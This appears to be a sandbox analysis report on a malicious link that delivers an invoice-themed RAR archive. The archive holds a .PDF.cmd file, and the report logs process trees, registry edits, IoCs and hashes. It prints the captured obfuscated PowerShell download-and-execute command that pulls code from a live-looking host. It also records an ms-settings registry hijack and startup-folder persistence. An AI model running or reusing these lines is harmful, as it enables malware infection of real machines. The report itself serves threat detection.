hxxps://cfdisat[.]blogspot[.]com/

Analysis

max time kernel
58s
max time network
63s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
22-02-2024 17:05

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://cfdisat.blogspot.com/

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
82	5140	powershell.exe
88	5140	powershell.exe
90	5140	powershell.exe

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xpgdyq6_V.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xpgdyq6_VEX.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xpgdyq6_VAT.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xpgdyq6_VAA.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xpgdyq6_Vy.lnk	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "94"	LogonUI.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000_Classes\ms-settings\Shell\Open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000_Classes\ms-settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000_Classes\ms-settings\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000_Classes\ms-settings\Shell\Open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\_xpgdyq6_V\\_xpgdyq6_Vi7.exe"	powershell.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
1812	msedge.exe
1812	msedge.exe
2320	msedge.exe
2320	msedge.exe
4644	msedge.exe
4644	msedge.exe
4708	identity_helper.exe
4708	identity_helper.exe
5140	powershell.exe
5140	powershell.exe
5140	powershell.exe
4488	7zFM.exe
4488	7zFM.exe
4488	7zFM.exe
4488	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4488	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeRestorePrivilege	4488	7zFM.exe
Token: SeRestorePrivilege	4408	7zFM.exe
Token: 35	4488	7zFM.exe
Token: 35	4408	7zFM.exe
Token: SeSecurityPrivilege	4488	7zFM.exe
Token: SeDebugPrivilege	5140	powershell.exe
Token: SeShutdownPrivilege	5792	shutdown.exe
Token: SeRemoteShutdownPrivilege	5792	shutdown.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
4488	7zFM.exe
4408	7zFM.exe
4488	7zFM.exe
4488	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5964	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2320 wrote to memory of 3728	2320	msedge.exe	87
PID 2320 wrote to memory of 3728	2320	msedge.exe	87
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 3084	2320	msedge.exe	88
PID 2320 wrote to memory of 1812	2320	msedge.exe	89
PID 2320 wrote to memory of 1812	2320	msedge.exe	89
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90
PID 2320 wrote to memory of 3116	2320	msedge.exe	90

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cfdisat.blogspot.com/
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd515946f8,0x7ffd51594708,0x7ffd51594718
  2⤵
  PID:3728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
  2⤵
  PID:3084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:1212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:1940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
  2⤵
  PID:3096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  2⤵
  PID:1872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5484 /prefetch:8
  2⤵
  PID:4696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 /prefetch:8
  2⤵
  PID:1896
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:3432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
  2⤵
  PID:2968
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\FACTURAhfjv____v__Z(484271).rar"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4408
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\FACTURAhfjv____v__Z(484271).rar"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zO881F17E7\FACTURAhfjv____v__Z(484271).PDF.cmd" "
    3⤵
    PID:4652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo ieX("Ie`X`(N`ew-oBJ`e`Ct N`et.`Web`ClIeNt`).DOwnlOa`d`StRIN`G('http://adbd.tech/22/22')"); "
      4⤵
      PID:5132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5140
    - - C:\Windows\system32\shutdown.exe
        
        "C:\Windows\system32\shutdown.exe" /r /t 15
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,16811909054313212805,4297983943434762746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
  2⤵
  PID:6104

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3708

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3947855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3bde7b7b0c0c9c66bdd8e3f712bd71eb

SHA1
266bd462e249f029df05311255a15c8f42719acc

SHA256
2ccd4a1b56206faa8f6482ce7841636e7bb2192f4cf5258d47e209953a77a01a

SHA512
5fab7a83d86d65e7c369848c5a7d375d9ad132246b57653242c7c7d960123a50257c9e8c4c9a8f22ee861fce357b018236ac877b96c03990a88de4ddb9822818

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9cafa4c8eee7ab605ab279aafd19cc14

SHA1
e362e5d37d1a79e7b4a8642b068934e4571a55f1

SHA256
d0817f51aa2fb8c3cae18605dbfd6ec21a6ff3f953171e7ac064648ffdee1166

SHA512
eefd65ffcfb98ac8c3738eb2b3f4933d5bc5b992a1d465b8424903c8f74382ec2c95074290ddbb1001204843bfef59a32b868808a6bee4bc41ee9571515bbac6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
0e7329c8aed01cabeb30d493182e9918

SHA1
3842bed82e0aab6da31c2384b97e73709c441ef2

SHA256
76bec268bb8e4c54749de00ce610b53fb4d362ab736294e94db064c72516dc88

SHA512
dff55319e2ee4b3d8116b513c6c5d113dff47afdcbf719cbca220d203e9619b8112d47ed6ea42ab6ae36fcf4a310c8f8cbbbf5696d018572f0902d45776cf3ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c3ce55b14a595d49129fcc7f6b3b92ae

SHA1
cb61c9dbc32038670b75c969fd8206744f3d9950

SHA256
dd396f8a364336da1d47d35e67d2b0dc0b8ab7c95944e47dc0493a2fd32115fa

SHA512
07bbbbeb723e7abcfd66489385cb8af95f517bfb91a9e12c386222529cf19bb3682e458744faced9ab461ede1d2d80b21ef83142437c02d6252986c36141af1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
94ed1fd3e425efb142ad11b8a12561b3

SHA1
fd536a5dfbaad9ebea5c3813669eed109452ea9c

SHA256
ab2615cda4bdeb8eb97930cfe3b8a6802420badfee59e4cd8dc68ede4c7117bc

SHA512
31e3261495d98e522a3211dbbf001c747b762d6a6d6d7c6c99627ae827fcf9d37bce53890d3a2ea921c6a908c52fb05a706af6d5254d873377c0a1f9b5613524

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9df86115a484d950c6a2405a8180351d

SHA1
f8103b6f063a0278e86c98608efb0dc7d553a655

SHA256
136c896a5d4ac0f6bc494af856ba18e79fc86a90c0ea0297698631b2949723cf

SHA512
2dfbc772481aa7c11ca8fd207e85f16c3c6c7f7c68c88f002e8ae0e2743bb0c25180459d71f524fbca01fcf5ba5322520c09e41361e7564cb29c9183f824b54a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
fbd1549ad3236ddadb5768df3c9d8c97

SHA1
db79336ba48fd031938864c4cd329bff777bf24f

SHA256
76bdad5f9c26adc190970b6d57bec6214721705ba4610dd594ee8b8a7764d0b2

SHA512
b9d2e174401e4aa5abbfe8f019e2c8c10717c5d1bc73a528b148b18b947671be3e3d98917d5e4b55082b7d764a420aec7796123f825fcbdc60a11e919b572114

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7fc5a4925739cb0de221add8ecf93c3e

SHA1
915c07075b58d94fdd2ff573ae7f6a62af505332

SHA256
e333624908824817d264f371698c61b86a365d357e6b4842eed0a011518d17d6

SHA512
a2692a2127efff1412a90a6743a0ca1afe4df77bb6291c98b3c37ea4f71437cfe0cf13e7d55fe377582494f5edb2725fa3b9d655b4112df9422562c54144700a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO881F17E7\FACTURAhfjv____v__Z(484271).PDF.cmd

Filesize
858B

MD5
5cebb1e3af07b0b80e8a6bf9a808c66f

SHA1
dfca397d7e3ffdeba5dc53488ad1ba3f4f92ce41

SHA256
54a5e4ccd8b4518d5fa470bfce7fbe5b9a7726d2e066863f15b46be55008fc6e

SHA512
74ead70c14e50e0c44106761b0d324e52f0248dd8ca47e645e1ef796981856485918550a28cac853e4ed5a24ab8d40e8e481f466fdc98b77b93cacb7d528dc40

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4kuomhm.3ji.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\FACTURAhfjv____v__Z(484271).rar

Filesize
748B

MD5
18d71cbbf0b28dc1b805b095e16ed842

SHA1
c5990ba3d779907d9bf925ffc9dec68147fd3ef4

SHA256
6e043514100e0164586bb00f8ea7e13d42475c0df2d5447438610da4117bd01c

SHA512
97fb613b6610f503bd0182eef13a4ff758c46c700791d6dcf076df7995e7af117d43c969aded2cd2f5708e4e5b857516fc13eccde8eeebc11e229dfca201f880

Download Submit
memory/5140-109-0x000001D93A150000-0x000001D93A194000-memory.dmp

Filesize
272KB

Download
memory/5140-106-0x000001D939E00000-0x000001D939E10000-memory.dmp

Filesize
64KB

Download
memory/5140-107-0x000001D939E00000-0x000001D939E10000-memory.dmp

Filesize
64KB

Download
memory/5140-108-0x000001D939E00000-0x000001D939E10000-memory.dmp

Filesize
64KB

Download
memory/5140-100-0x000001D939D10000-0x000001D939D32000-memory.dmp

Filesize
136KB

Download
